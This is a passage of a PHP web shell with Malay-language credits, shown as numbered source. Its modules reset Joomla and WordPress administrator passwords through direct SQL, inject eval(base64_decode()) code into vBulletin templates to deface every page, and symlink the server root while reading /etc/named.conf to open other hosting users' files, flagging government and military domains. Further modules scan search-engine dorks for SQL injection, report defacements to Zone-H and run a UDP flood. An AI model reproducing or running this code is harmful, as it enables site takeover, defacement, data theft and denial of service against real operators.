  1427. <td>Exploit it !</td>
  1428. </tr>
  1429. ';
  1430.  
  1431. }
  1432.  
  1433. ?>
  1434. <html>
  1435.  
  1436. <body>
  1437.  
  1438. <p align="center">&nbsp;</p>
  1439. <p align="center">&nbsp;</p>
  1440. <p align="center">&nbsp;</p>
  1441. <form method="POST" action="">
  1442. <p align="center">&nbsp;
  1443. </p>
  1444. <p align="center">
  1445. <font size="4"><br></font></p>
  1446. <p align="center">Site :
  1447. <input type="text" name="site" size="33" style="color:#FF0000;background-color:#000000" value="http://www.site.com/"><select style="color:#FF0000;background-color:#000000" size="1" name="what">
  1448. <option>Wordpress</option>
  1449. <option>Joomla</option>
  1450. <option>Nuke's</option>
  1451. <option>Xoops</option>
  1452. </select><input style="color:#FF0000;background-color:#000000" type="submit" value="Scan"></p>
  1453. </form>
  1454. <?
  1455.  
  1456. // Start Scan :P :P ...
  1457.  
  1458. if($_POST){
  1459.  
  1460. $site=strip_tags(trim($_POST['site']));
  1461.  
  1462. t_header($site);
  1463.  
  1464. echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
  1465. echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
  1466. echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
  1467. echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
  1468. echo '</table></body></html>';
  1469.  
  1470. }
  1471. }
  1472.  
  1473.  
  1474. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  1475. {
  1476. ?>
  1477. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  1478.  
  1479. <?php
  1480.  
  1481. @error_reporting(0);
  1482. @ini_set('error_log',NULL);
  1483. echo '
  1484. <div class="com">
  1485. <form method="post">
  1486. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1487. <br />
  1488. <tr>
  1489. <td>Host :</td>
  1490. <td><input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost" /></td>
  1491. </tr>
  1492. <tr>
  1493. <td>user :</td>
  1494. <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  1495. </tr>
  1496. <tr>
  1497. <td>Pass :</td><td><input style="color:#FF0000;background-color:#000000" type="text" name="pass"/></td>
  1498. </tr>
  1499. <tr>
  1500. <td>db :</td>
  1501. <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  1502. </tr>
  1503. <tr>
  1504. <td>dbprefix :</td>
  1505. <td><input type="text" style="color:#FF0000;background-color:#000000" name="jop" value="jos_users" /></td>
  1506. </tr>
  1507. <tr>
  1508. <td>Admin User :</td>
  1509. <td><input type="text" style="color:#FF0000;background-color:#000000" name="users" value="vvip" /></td>
  1510. </tr>
  1511. <tr>
  1512. <td>Admin Password :</td>
  1513. <td><input type="text" style="color:#FF0000;background-color:#000000" name="passwd" value="vvip" /></td>
  1514. </tr>
  1515. <tr>
  1516. <td colspan="6" align="center" style="color:#FF0000;background-color:#000000" width="70%"> <input type="submit" value="SQL" style="color:#FF0000;background-color:#000000" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  1517.  
  1518. </tr>
  1519. </table>
  1520. </form> </div></center>';
  1521.  
  1522. $host = $_POST['host'];
  1523. $user = $_POST['user'];
  1524. $pass = $_POST['pass'];
  1525. $db = $_POST['db'];
  1526. $jop = $_POST['jop'];
  1527. $users = $_POST['users'];
  1528. $admpas = $_POST['passwd'];
  1529.  
  1530. if(isset($host) ) {
  1531. $con = @ mysql_connect($host,$user,$pass) or die ;
  1532. $sedb = @ mysql_select_db($db) or die;
  1533.  
  1534. $query= @ mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator") or die;
  1535. $query= @ mysql_query("UPDATE $jop SET password ='".$admpas."' WHERE usertype = Super Administrator") or die;
  1536.  
  1537. if ($query)
  1538. {
  1539. echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
  1540. }
  1541. else if (!$query)
  1542. {
  1543. echo "error";
  1544. }
  1545.  
  1546. }else
  1547. {
  1548. echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1549. }
  1550. }
  1551.  
  1552.  
  1553.  
  1554. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  1555. {
  1556. ?>
  1557. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  1558.  
  1559. <?php
  1560.  
  1561. @error_reporting(0);
  1562. @ini_set('error_log',NULL);
  1563. echo '
  1564. <div class="com">
  1565. <form method="post">
  1566. <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
  1567. <br />
  1568.  
  1569. <tr>
  1570. <td>Host :</td>
  1571. <td><input type="text" name="host" style="color:#FF0000;background-color:#000000" value="localhost" /></td>
  1572. </tr>
  1573.  
  1574. <tr>
  1575. <td>user :</td>
  1576. <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
  1577. </tr>
  1578. <tr>
  1579. <td>Pass :</td><td><input type="text" style="color:#FF0000;background-color:#000000" name="pass"/></td>
  1580. </tr>
  1581. <tr>
  1582. <td>db :</td>
  1583. <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
  1584. </tr>
  1585. <tr>
  1586. <td>user admin :</td>
  1587. <td><input type="text" style="color:#FF0000;background-color:#000000" name="useradmin" value="admin" /></td>
  1588. </tr>
  1589. <tr>
  1590. <td>pass admin :</td>
  1591. <td><input type="text" style="color:#FF0000;background-color:#000000" name="passadmin" value="admin"/></td>
  1592. </tr>
  1593. <tr>
  1594. <td colspan="6" align="center" width="70%"> <input type="submit" style="color:#FF0000;background-color:#000000" value="SQL" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
  1595.  
  1596. </tr>
  1597. </table>
  1598. </form> </div></center>';
  1599.  
  1600. $host = $_POST['host'];
  1601. $user = $_POST['user'];
  1602. $pass = $_POST['pass'];
  1603. $db = $_POST['db'];
  1604. $useradmin = $_POST['useradmin'];
  1605. $pass_ad = $_POST['passadmin'];
  1606.  
  1607. if(isset($host) ) {
  1608. $con =@ mysql_connect($host,$user,$pass) or die ;
  1609. $sedb =@ mysql_select_db($db) or die;
  1610. $crypt = crypt($pass_ad);
  1611. $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1612. $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1');
  1613. if ($query)
  1614. {
  1615. echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
  1616. }
  1617. else if (!$query)
  1618. {
  1619. echo "error";
  1620. }
  1621.  
  1622. }else
  1623. {
  1624. echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
  1625. }
  1626. }
  1627.  
  1628.  
  1629. elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info'))
  1630. {
  1631. ?>
  1632. <form action="?y=<?php echo $pwd; ?>&amp;x=web-info" method="post">
  1633.  
  1634.  
  1635. <?php
  1636. @set_time_limit(0);
  1637. @error_reporting(0);
  1638.  
  1639. function sws_domain_info($site)
  1640. {
  1641. $getip = @file_get_contents("http://networktools.nl/whois/$site");
  1642. flush();
  1643. $ip = @findit($getip,'<pre>','</pre>');
  1644.  
  1645. return $ip;
  1646. flush();
  1647. }
  1648.  
  1649.  
  1650. function sws_net_info($site)
  1651. {
  1652. $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  1653. $ip = @findit($getip,'<pre>','</pre>');
  1654.  
  1655. return $ip;
  1656. flush();
  1657. }
  1658.  
  1659. function sws_site_ser($site)
  1660. {
  1661. $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  1662. $ip = @findit($getip,'<pre>','</pre>');
  1663.  
  1664. return $ip;
  1665. flush();
  1666. }
  1667.  
  1668. function sws_sup_dom($site)
  1669. {
  1670. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  1671. $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  1672.  
  1673. return $ip;
  1674. flush();
  1675. }
  1676.  
  1677. function sws_port_scan($ip)
  1678. {
  1679.  
  1680. $list_post = array('80','21','22','2082','25','53','110','443','143');
  1681.  
  1682. foreach ($list_post as $o_port)
  1683. {
  1684. $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  1685.  
  1686. if($connect)
  1687. {
  1688. echo " $ip : $o_port &nbsp;&nbsp;&nbsp; <u style=\"color: #009900\">Open</u> <br /><br />";
  1689. flush();
  1690. }
  1691. }
  1692.  
  1693. }
  1694.  
  1695. function findit($mytext,$starttag,$endtag) {
  1696. $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  1697. $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1698. return @substr($mytext,$posLeft,$posRight-$posLeft);
  1699. flush();
  1700. }
  1701.  
  1702. echo '<br><br><center>';
  1703.  
  1704.  
  1705. echo '
  1706. <br />
  1707. <div class="sc"><form method="post">
  1708. Site to scan : <input type="text" name="site" size="30" style="color:#FF0000;background-color:#000000" value="site.com" /> &nbsp;&nbsp <input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !" />
  1709. </form></div>';
  1710.  
  1711.  
  1712. if(isset($_POST['scan']))
  1713. {
  1714.  
  1715.  
  1716.  
  1717.  
  1718. $site = @htmlentities($_POST['site']);
  1719. if (empty($site)){die('<br /><br /> Not add IP .. !');}
  1720.  
  1721. $ip_port = @gethostbyname($site);
  1722.  
  1723. echo "
  1724.  
  1725.  
  1726.  
  1727.  
  1728.  
  1729. <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
  1730.  
  1731. <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
  1732. <div class=\"ru\"> <br /><br /><pre>
  1733. ";
  1734. echo "".sws_port_scan($ip_port)." </pre></div> ";
  1735.  
  1736. flush();
  1737.  
  1738.  
  1739.  
  1740. echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  1741. <div class=\"ru\">
  1742. <pre>".sws_domain_info($site)."</pre></div>";
  1743. flush();
  1744.  
  1745. echo "
  1746. <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  1747. <div class=\"ru\">
  1748. <pre>".sws_net_info($site)."</pre> </div>";
  1749. flush();
  1750.  
  1751. echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  1752. <div class=\"ru\">
  1753. <pre>".sws_sup_dom($site)."</pre> </div>";
  1754. flush();
  1755.  
  1756.  
  1757. echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  1758. <div class=\"ru\">
  1759. <pre>".sws_site_ser($site)."</pre> </div>
  1760. <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
  1761. flush();
  1762.  
  1763. }
  1764.  
  1765. echo '</center>';
  1766. }
  1767.  
  1768. elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
  1769. {
  1770. ?>
  1771. <form action="?y=<?php echo $pwd; ?>&amp;x=vb" method="post">
  1772.  
  1773. <br><br><br><div align="center">
  1774. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
  1775. <font color="#00FF00">&nbsp;vB Index Changer</font><font color="#FF0000">
  1776. <font face="Tahoma">! Change All Pages For Forum !&nbsp;
  1777. <br></font></div><br>
  1778.  
  1779. <?
  1780.  
  1781. if(empty($_POST['index'])){
  1782. echo "<center><FORM method=\"POST\">
  1783. host : <INPUT size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\">
  1784. database : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
  1785. username : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"username\" type=\"text\">
  1786. password : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"vb\" name=\"password\" type=\"text\"><br>
  1787. <br>
  1788. <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
  1789. <INPUT value=\"Set\" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
  1790. </FORM></center>";
  1791. }else{
  1792. $localhost = $_POST['localhost'];
  1793. $database = $_POST['database'];
  1794. $username = $_POST['username'];
  1795. $password = $_POST['password'];
  1796. $index = $_POST['index'];
  1797. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1798. @mysql_select_db($database) or die(mysql_error());
  1799.  
  1800. $index=str_replace("\'","'",$index);
  1801.  
  1802. $set_index = "{\${eval(base64_decode(\'";
  1803.  
  1804. $set_index .= base64_encode("echo \"$index\";");
  1805.  
  1806.  
  1807. $set_index .= "\'))}}{\${exit()}}</textarea>";
  1808.  
  1809. echo("UPDATE template SET template ='".$set_index."' ") ;
  1810. $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
  1811.  
  1812. if($ok){
  1813. echo "!! update finish !!<br><br>";
  1814. }
  1815.  
  1816. }
  1817. # Footer
  1818. }
  1819.  
  1820.  
  1821. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  1822. {
  1823. ?>
  1824. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  1825.  
  1826. <?php
  1827.  
  1828. @set_time_limit(0);
  1829.  
  1830. echo "<center>";
  1831.  
  1832. @mkdir('sym',0777);
  1833. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1834. $write =@fopen ('sym/.htaccess','w');
  1835. fwrite($write ,$htaccess);
  1836. @symlink('/','sym/root');
  1837. $filelocation = basename(__FILE__);
  1838. $read_named_conf = @file('/etc/named.conf');
  1839. if(!$read_named_conf)
  1840. {
  1841. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1842. }
  1843. else
  1844. {
  1845. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  1846. foreach($read_named_conf as $subject){
  1847. if(eregi('zone',$subject)){
  1848. preg_match_all('#zone "(.*)"#',$subject,$string);
  1849. flush();
  1850. if(strlen(trim($string[1][0])) >2){
  1851. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1852. $name = $UID['name'] ;
  1853. @symlink('/','sym/root');
  1854. $name = $string[1][0];
  1855. $iran = '\.ir';
  1856. $israel = '\.il';
  1857. $indo = '\.id';
  1858. $sg12 = '\.sg';
  1859. $edu = '\.edu';
  1860. $gov = '\.gov';
  1861. $gose = '\.go';
  1862. $gober = '\.gob';
  1863. $mil1 = '\.mil';
  1864. $mil2 = '\.mi';
  1865. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  1866. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  1867. {
  1868. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  1869. }
  1870. echo "
  1871. <tr>
  1872.  
  1873. <td>
  1874. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  1875. </td>
  1876.  
  1877. <td>
  1878. '.$UID['name']."
  1879. </td>
  1880.  
  1881. <td>
  1882. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  1883. </td>
  1884.  
  1885. </tr></div> ";
  1886. flush();
  1887. }
  1888. }
  1889. }
  1890. }
  1891.  
  1892. echo "</center></table>";
  1893.  
  1894. }
  1895.  
  1896.  
  1897. elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
  1898. {
  1899. ?>
  1900. <form action="?y=<?php echo $pwd; ?>&amp;x=About" method="post">
  1901.  
  1902. <center><br><br><font size=2> Dalam section ini, saya ingin mengucapkan terima kasih kepada tuan punya shell ini, Alex John & the team
  1903. kerana membenarkan saya mengubahsuai dan menambah function-function yang lain di dalam shell ini, all the credit ditujukan kepada
  1904. dia :) <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/1.gif' /></font><br>
  1905. <font size=2> Tidak lupa juga kepada rakan saya,namanya rahsia, hehehe, kerana membantu saya sedikit di dalam PHP, credit juga ditujukan
  1906. kepada beliau :) <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/16.gif' /></font><br>
  1907. <font size=2> Semua function-function tambahan ini bukan-lah saya yang merekanya, saya edit dari macam2 shell dan masukkan ia ke dalam
  1908. shell ini <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/10.gif' /></font><br>
  1909. <font size=2> Kalau ada apa2 yang tak kena, calling2 tau <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/101.gif' /> kerana
  1910. saya juga kadang2 buat silap, nooblah kan <img src'http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/20.gif' /></font><br>
  1911. <font size=2> Saya lepaskan shell nie bersama code asalnya sekali <img src='http://torrent.jiwang.cc/images/smilies/strongbench.gif' />, tetapi dilarang mengubah shell ini kepada nama anda, hormati orang asal yang mengedit shell ini <img src='http://torrent.jiwang.cc/images/smilies/rant.gif' /></font><br><br>
  1912. <font size=2> Lastly, kepada <a href='http://www.facebook.com/machocyb3rcrime' target='_blank'>Macho Gayies A/L Tambi</a>, jgn duk gatal2 pulak meh edit shell nie seperti mana kamu melakukannya di local domain versi afnum</font><br>
  1913. <font size=2> Baiklah, sampai di sini saja ya creditnya, terima kasih kerana menggunakan shell ini. <img src='http://torrent.jiwang.cc/images/smilies/wave.gif' /></font></center><br><br><br><br>
  1914.  
  1915. <?php
  1916. }
  1917. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
  1918. {
  1919. ?>
  1920. <form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">
  1921.  
  1922. <?php
  1923.  
  1924. echo '<br><br><center><form method="post" action=""><font color="red">Dork :</font> <input type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>';
  1925.  
  1926. ob_start();
  1927. set_time_limit(0);
  1928.  
  1929. if (isset($_POST['scan'])) {
  1930.  
  1931. $browser = $_SERVER['HTTP_USER_AGENT'];
  1932.  
  1933. $first = "startgoogle.startpagina.nl/index.php?q=";
  1934. $sec = "&start=";
  1935. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  1936.  
  1937. for($id=0 ; $id<=30; $id++){
  1938. $page=$id*10;
  1939. $dork=urlencode($_POST['dork']);
  1940. $url = $first.$dork.$sec.$page;
  1941.  
  1942. $curl = curl_init($url);
  1943. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1944. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  1945. $result = curl_exec($curl);
  1946. curl_close($curl);
  1947.  
  1948. preg_match_all($reg,$result,$matches);
  1949. }
  1950. foreach($matches[1] as $site){
  1951.  
  1952. $url = preg_replace("/=/", "='", $site);
  1953. $curl=curl_init();
  1954. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1955. curl_setopt($curl,CURLOPT_URL,$url);
  1956. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  1957. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  1958. $GET=curl_exec($curl);
  1959. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT *
  1960.  
  1961. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  1962. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
  1963.  
  1964. Found..</font></b></center>';
  1965. ob_flush();flush();
  1966. }else{
  1967. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>';
  1968. ob_flush();flush();
  1969. }
  1970.  
  1971. ob_flush();flush();
  1972. }
  1973. ob_flush();flush();
  1974. }
  1975. ob_flush();flush();
  1976. }
  1977.  
  1978. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){ ?>
  1979. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  1980. <br><br><? echo '<p style="text-align: center;"> <img alt="" src="http://www.zone-h.org/images/logo.gif" style="width: 261px; height: 67px;" /></p>
  1981. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Newbie3viLc063s" /><br> <select class="inputz" name="hackmode">
  1982. <option>------------------------------------SELECT-------------------------------------</option>
  1983. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  1984. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  1985. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  1986. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  1987. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  1988. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  1989. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  1990. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  1991. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  1992. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  1993. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  1994. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  1995. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  1996. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  1997. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  1998. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  1999. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  2000. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  2001. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  2002. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  2003. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  2004. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  2005. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  2006. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  2007. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  2008. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  2009. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  2010. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  2011.  
  2012. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  2013. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  2014. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2015. </select> <br>
  2016.  
  2017. <select class="inputz" name="reason">
  2018. <option >------------------------------------SELECT-------------------------------------</option>
  2019. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  2020. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  2021. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  2022. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  2023. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  2024. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  2025. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  2026. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2027. </select> <br>
  2028. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  2029. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  2030. </form>'; ?>
  2031. <?
  2032. echo "</form></center>";?>
  2033. <?
  2034. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  2035. {
  2036. $k = curl_init();
  2037. curl_setopt($k, CURLOPT_URL, $url);
  2038. curl_setopt($k,CURLOPT_POST,true);
  2039. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  2040. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2041. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2042. $kubra = curl_exec($k);
  2043. curl_close($k);
  2044. return $kubra;
  2045. }
  2046. {
  2047. ob_start();
  2048. $sub = @get_loaded_extensions();
  2049. if(!in_array("curl", $sub))
  2050. {
  2051. die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  2052. }
  2053.  
  2054. $hacker = $_POST['defacer'];
  2055. $method = $_POST['hackmode'];
  2056. $neden = $_POST['reason'];
  2057. $site = $_POST['domain'];
  2058.  
  2059. if (empty($hacker))
  2060. {
  2061. die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  2062. }
  2063. elseif($method == "--------SELECT--------")
  2064. {
  2065. die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  2066. }
  2067. elseif($neden == "--------SELECT--------")
  2068. {
  2069. die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  2070. }
  2071. elseif(empty($site))
  2072. {
  2073. die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  2074. }
  2075. $i = 0;
  2076. $sites = explode("\n", $site);
  2077. while($i < count($sites))
  2078. {
  2079. if(substr($sites[$i], 0, 4) != "http")
  2080. {
  2081. $sites[$i] = "http://".$sites[$i];
  2082. }
  2083. ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  2084. echo "Domain : ".$sites[$i]." Defaced Last Years !";
  2085. ++$i;
  2086. }
  2087. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  2088. }
  2089. ?>
  2090. <?php }
  2091.  
  2092. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2093. {
  2094. ?>
  2095. <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2096. <?php
  2097.  
  2098. //UDP
  2099. if(isset($_GET['host'])&&isset($_GET['time']))
  2100. {
  2101. $packets = 0;
  2102. ignore_user_abort(TRUE);
  2103. set_time_limit(0);
  2104.  
  2105. $exec_time = $_GET['time'];
  2106.  
  2107. $time = time();
  2108. //print "Started: ".time('d-m-y h:i:s')."<br>";
  2109. $max_time = $time+$exec_time;
  2110.  
  2111. $host = $_GET['host'];
  2112.  
  2113. for($i=0;$i<65000;$i++){
  2114. $out .= 'X';
  2115. }
  2116.  
  2117. while(1){
  2118. $packets++;
  2119. if(time() > $max_time){ break; }
  2120. $rand = rand(1,65000);
  2121. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2122. if($fp){
  2123. fwrite($fp, $out);
  2124. fclose($fp);
  2125. }
  2126. }
  2127.  
  2128. echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2129. echo '<br><br>
  2130. <form action="'.$surl.'" method=GET>
  2131. <input type="hidden" name="act" value="phptools">
  2132. Host: <br><input type=text name=host><br>
  2133. Length (seconds): <br><input type=text name=time><br>
  2134. <input type=submit value=Go>
  2135. </form>';
  2136. }
  2137. else
  2138. {
  2139. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2140. <table class="tabnet" style="width:300px;">
  2141. <tr>
  2142. <th colspan="2">UDP Flood</th>
  2143. </tr>
  2144. <tr>
  2145. <td>&nbsp;&nbsp;Host</td>
  2146. <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  2147. </tr>
  2148. <tr>
  2149. <td>&nbsp;&nbsp;Length (seconds)</td>
  2150. <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  2151. </tr>
  2152. <tr>
  2153. <td><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
  2154. </tr>
  2155. </table>
  2156. </center>';
  2157. }
  2158. }
  2159.  
  2160. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2161. {
  2162. ?>
  2163. <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2164. <?php
  2165.  
  2166. //UDP
